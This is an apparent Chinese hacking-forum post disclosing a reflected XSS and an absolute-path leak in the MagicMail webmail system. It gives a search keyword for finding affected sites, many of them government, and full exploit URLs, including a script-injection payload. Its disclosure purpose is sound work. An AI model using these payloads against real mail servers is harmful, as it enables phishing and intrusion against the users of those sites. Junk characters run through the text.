找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1912|回复: 0
打印 上一主题 下一主题

MagicMail迈捷邮件系统XSS及绝对路径漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-9 20:38:41 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞9 t! K9 w8 h6 g$ H' U
- o  o& X  g( {

3 U' y' h0 L" G' f) C% ]8 `' h包含  一个反射性XSS  以及  绝对路径泄漏
8 D- z- z1 K$ f  e看了看 貌似全部是linux的。( L5 [& e1 `5 P( }# S& @
; |. n4 x; v5 ^) R& t( o1 _" P, i
关键字:迈捷邮件系统 by MagicMail
$ F' A9 I" y" y
- {# E0 Q: O+ b  w可以看到很多政府网站都用这个邮件系统  R% j" c) K" W9 Z9 c: r
9 Y2 ?+ @4 o8 e- q
绝对路径 http://madman.in/index.php?login_type=declare&language=0 W8 _& H) j( A/ {# M7 o0 V
" P8 t1 p. e; A: m- v

) Q, o5 b- ]8 P6 U1 j9 T
2 u7 `# j1 w) ?: H" Y( GXSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E; ]9 a6 {. J5 T  W% A$ x2 v

! l+ B. L* U7 x! N/ }/ L/ r% h; F# o% V+ g) H) S6 O

; t% R1 u9 h" ^* U8 K3 I; I. ^% G虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等
5 O+ H4 A8 S4 _% C, \ " Z8 x+ J2 K# P3 W
修复方案:看官方补丁吧。2 c# ~# F# b- U3 S$ v+ V
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表